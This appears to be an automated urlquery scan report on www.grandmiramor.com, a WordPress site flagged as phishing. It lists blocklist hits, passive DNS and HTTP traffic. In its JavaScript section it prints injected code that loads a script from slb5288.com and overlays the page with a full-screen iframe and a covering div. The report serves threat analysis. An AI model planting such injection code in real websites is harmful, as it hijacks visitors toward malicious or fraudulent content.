Overview

URL www.grandmiramor.com/
IP156.240.38.111
ASNHONG KONG Megalayer Technology Co.,Limited
Location Hong Kong
Report completed2022-11-24 15:13:17 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-24 2 www.grandmiramor.com/ Phishing
2022-11-24 2 www.grandmiramor.com/ Phishing
2022-11-24 2 grandmiramor.com/wp-includes/css/classic-themes.min.css?ver=1 Phishing
2022-11-24 2 grandmiramor.com/vue.min.js Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/fontawesome/web (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/waypoints/jquer (...) Phishing
2022-11-24 2 grandmiramor.com/ Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/fontawesome/css (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/prettyphoto/css (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/style.css?ver=6.1.1 Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/sparklethemes/mobile-menu/navi (...) Phishing
2022-11-24 2 grandmiramor.com/wp-includes/js/wp-emoji-release.min.js?ver=6.1.1 Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/prettyphoto/js/ (...) Phishing
2022-11-24 2 grandmiramor.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1 Phishing
2022-11-24 2 grandmiramor.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/lightslider/js/ (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/library/theia-sticky-si (...) Phishing
2022-11-24 2 grandmiramor.com/wp-content/themes/educenter/assets/css/responsive.css?ver=6.1.1 Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (16)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS ocsp.pki.goog (5) 175 2018-07-01 06:43:07 UTC 2020-05-02 20:58:16 UTC 142.250.74.3
mnemonic passive DNS ocsp.globalsign.com (2) 2075 2012-07-20 17:46:16 UTC 2020-05-02 20:58:10 UTC 104.18.21.226
mnemonic passive DNS www.slb5288.com (13) 0 2022-07-11 06:49:41 UTC 2022-11-23 13:36:37 UTC 103.35.116.217 Unknown ranking
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-11-24 05:36:55 UTC 34.102.187.140
mnemonic passive DNS s.w.org (1) 748 2017-01-30 04:56:16 UTC 2022-11-24 05:41:41 UTC 192.0.77.48
mnemonic passive DNS fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-11-24 11:11:51 UTC 142.250.74.10
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-11-24 05:30:55 UTC 34.117.237.239
mnemonic passive DNS push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.89.114.252
mnemonic passive DNS img-getpocket.cdn.mozilla.net (5) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
mnemonic passive DNS fonts.gstatic.com (2) 0 2014-09-09 00:40:21 UTC 2022-11-24 11:09:52 UTC 216.58.207.195 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS r3.o.lencr.org (8) 344 No data No data 23.36.76.226
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
mnemonic passive DNS www.grandmiramor.com (2) 0 2019-02-13 18:05:45 UTC 2022-11-24 11:12:43 UTC 156.240.38.111 Unknown ranking
mnemonic passive DNS grandmiramor.com (33) 0 2015-06-01 08:23:15 UTC 2022-10-29 22:11:56 UTC 156.240.38.111 Unknown ranking
mnemonic passive DNS hm.baidu.com (4) 8254 2012-05-26 08:38:45 UTC 2020-02-11 02:47:13 UTC 103.235.46.191
mnemonic passive DNS ocsp.digicert.com (2) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 156.240.38.111

Date UQ / IDS / BL URL IP
2022-12-03 03:12:25 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-30 07:11:19 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-26 23:11:45 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-24 23:14:09 +0000
0 - 0 - 2 www.grandmiramor.com/ 156.240.38.111
2022-11-24 15:13:17 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111

Last 5 reports on ASN: HONG KONG Megalayer Technology Co.,Limited

Date UQ / IDS / BL URL IP
2022-12-03 08:52:15 +0000
0 - 0 - 4 lkjianfei.com/ 154.55.252.175
2022-12-03 08:11:40 +0000
0 - 0 - 20 terroantkiller.com/ 154.64.12.112
2022-12-03 03:12:25 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-12-02 12:40:49 +0000
0 - 0 - 7 www.guoguojf.com/tz8t/?y4L0=bA4t+Xh+7xa2wm4yX (...) 154.22.245.78
2022-12-02 05:11:41 +0000
0 - 0 - 1 lpsgkls.com/ 154.64.34.209

Last 5 reports on domain: grandmiramor.com

Date UQ / IDS / BL URL IP
2022-12-03 03:12:25 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-30 07:11:19 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-26 23:11:45 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-24 23:14:09 +0000
0 - 0 - 2 www.grandmiramor.com/ 156.240.38.111
2022-11-24 15:13:17 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-12-03 03:12:25 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-23 11:11:58 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-23 07:54:52 +0000
0 - 0 - 18 gzslxhg.com/ 206.233.203.216
2022-11-23 07:11:55 +0000
0 - 0 - 18 www.grandmiramor.com/ 156.240.38.111
2022-11-21 23:11:58 +0000
0 - 0 - 19 www.grandmiramor.com/ 156.240.38.111


JavaScript

Executed Scripts (18)


Executed Evals (1)

#1 JavaScript::Eval (size: 121, repeated: 1) - SHA256: 351c61c90255ce1f7c781134c7f0565fc251ab0856c86c123195236129315c16

                                        document.writeln("<script language='javascript' type='text/javascript' src='https://www.slb5288.com/js/ob.js'></script>")
                                    

Executed Writes (6)

#1 JavaScript::Write (size: 178, repeated: 1) - SHA256: e1269a33e0b3f9de8393afde7898bc5736375dae29d3a43c4b00941c6306f8fb

                                        < iframe src = " https://www.slb5288.com/go/ob.html"
frameborder = "0"
style = "border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;" > < /iframe>
                                    

#2 JavaScript::Write (size: 6, repeated: 1) - SHA256: aac32651b10f567c461b9b4f255d6fb1fa6859b5368d8bd9a51af920ab21cf23

                                        < /div>
                                    

#3 JavaScript::Write (size: 101, repeated: 1) - SHA256: 8f35c718818ac4bf7efbd537a43227b298844f5eb5d60a85d813440b96b9a454

                                        < script language = 'javascript'
type = 'text/javascript'
src = 'https://www.slb5288.com/js/ob.js' > < /script>
                                    

#4 JavaScript::Write (size: 103, repeated: 1) - SHA256: 53db339b0b80637f13dfc63813d7366c899cebe0db896602886ece619163d82e

                                        < meta id = "viewport"
name = "viewport"
content = "user-scalable=no,width=device-width, initial-scale=1.0" / >
                                    

#5 JavaScript::Write (size: 77, repeated: 1) - SHA256: 235f11ebdcfb5a9e00906afc39c11efbaeed816b9040567cd61f18f9ce7242d4

                                        < style > html, body {
    widht: 100 % ;height: 100 % ;overflow: hidden;clear: both;
} < /style>
                                    

#6 JavaScript::Write (size: 102, repeated: 1) - SHA256: f586d612c00723dedb1ced3c5f41ec9def9333bd0669dfe697d48f99c9e19fc2

                                        < div style = "width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff" >
                                    


HTTP Transactions (83)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "164D11173045B569CAFB32E300E4C1EC6D6AB177FD34D0414CC40C541268779F"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3594
Expires: Thu, 24 Nov 2022 16:13:00 GMT
Date: Thu, 24 Nov 2022 15:13:06 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6127
Cache-Control: max-age=162012
Date: Thu, 24 Nov 2022 15:13:06 GMT
Etag: "637f47ef-1d7"
Expires: Sat, 26 Nov 2022 12:13:18 GMT
Last-Modified: Thu, 24 Nov 2022 10:31:11 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Backoff, Alert, Content-Type, Retry-After, Content-Length
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Thu, 24 Nov 2022 14:18:58 GMT
cache-control: public,max-age=3600
age: 3248
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    d130218d0e2841f39c99610fe1a2ab90
Sha1:   29fbe1e177ee55c7a61ae0a206afff271cf5f945
Sha256: 6b6d74dccf10c2bc98a91c3388280d7ba1d9596bf8cadd7db0e2f63720b3d152
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C9951A909F354174F0075A01C01C3C3AA6960983040E328BFBBBEA81AEB405C2"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9909
Expires: Thu, 24 Nov 2022 17:58:15 GMT
Date: Thu, 24 Nov 2022 15:13:06 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: X2+08zuzIJ644L683/US8yT8oqDDf8a3PNFpJ3Ph3RqkXplc9MvZu/Z3NWGydGvjEiuQU/HI/Ow=
x-amz-request-id: BPN174B2R62X82XS
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Thu, 24 Nov 2022 14:40:26 GMT
age: 1960
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:06 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET / HTTP/1.1 
Host: www.grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         156.240.38.111
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.21
X-Redirect-By: WordPress
Location: https://www.grandmiramor.com/


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Cache-Control, ETag, Pragma, Expires, Backoff, Last-Modified
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Thu, 24 Nov 2022 15:11:11 GMT
cache-control: public,max-age=3600
age: 116
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5304
Cache-Control: max-age=156126
Date: Thu, 24 Nov 2022 15:13:07 GMT
Etag: "637f3429-1d7"
Expires: Sat, 26 Nov 2022 10:35:13 GMT
Last-Modified: Thu, 24 Nov 2022 09:06:49 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: WLOUUGhGhgkM3xNut0VPCw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         52.89.114.252
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: kglaOKvX/BPrVtWYojtaGgavWZc=

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C3A864FACD0F4AFB3A747ECC456335CE9A850DC414A06798048ADEC29C380668"
Last-Modified: Wed, 23 Nov 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Thu, 24 Nov 2022 21:13:07 GMT
Date: Thu, 24 Nov 2022 15:13:07 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13219
Expires: Thu, 24 Nov 2022 18:53:27 GMT
Date: Thu, 24 Nov 2022 15:13:08 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7993
x-amzn-requestid: 9f0ff853-4819-47cd-959d-658401ea5748
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvCsG5mIAMFqAQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9211-1c48b9223684f2942f8dd42d;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:35:13 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: 7YSXUV-LZpsI7vciFhuqt1EVr6YRkhxcOgMg8z8bxLcOE01_baf6Gg==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 1b74ccf4cb51eacf97a0e6d60ae46a3e.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:47:06 GMT
etag: "43d1dec7fc06879988c9c3cadd800cc8145df988"
age: 62762
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7993
Md5:    92c78302bcce1568eb6a5563100b932c
Sha1:   43d1dec7fc06879988c9c3cadd800cc8145df988
Sha256: 0dda9914306c8e3a7ea75eade8e762652d93907dd6c5a8cc81707d6d8098b60a
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1dd98515-d0af-440a-8f3d-4c9986928081.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4309
x-amzn-requestid: a22b4d7e-e208-4bda-81c2-d13e6463380e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: blE0hGNioAMF_Tg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6371e81c-1b13846866f56a0e47675e56;Sampled=0
x-amzn-remapped-date: Mon, 14 Nov 2022 07:02:52 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0sYKpJWi2Tv9Atz3PYXm5j7kmncAOxjcLcK4hgAkJ5b4pNMDmjdB6g==
via: 1.1 ddd913fbbe7367d44af4ac06097e7a2a.cloudfront.net (CloudFront), 1.1 28390a4d24ed4fdccd685d99cd06cf4e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 07:14:07 GMT
age: 28741
etag: "126771b86638108050cf57c0d12faa27f80f0edb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4309
Md5:    841a4b110022a99ddea6f7bf66df0fa1
Sha1:   126771b86638108050cf57c0d12faa27f80f0edb
Sha256: 240fbffc1f9104433297d3ff7afba2d0b58d7f1b13d9a9260a1bad25216665db
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F433fbaf5-7c54-485b-af70-542e1e788832.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5070
x-amzn-requestid: d86d95ad-9b78-4047-82e7-04e83a97e330
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEwViF1GIAMF_PQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9423-10809ba1634776171cf79cb8;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:44:03 GMT
x-amz-cf-pop: SFO5-P2, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 8rbsN9OVJmneT9ov-Q7V4RB8DP5UWhhn-7cnukHiBpl06zmMM0zJTg==
via: 1.1 0dc4feb22bb4657ce2bb95fd05ec7122.cloudfront.net (CloudFront), 1.1 d6a002c70d55f415107618b0750d493c.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:57:20 GMT
age: 62148
etag: "89accd230fba95fe0049678070817b36ead015fa"
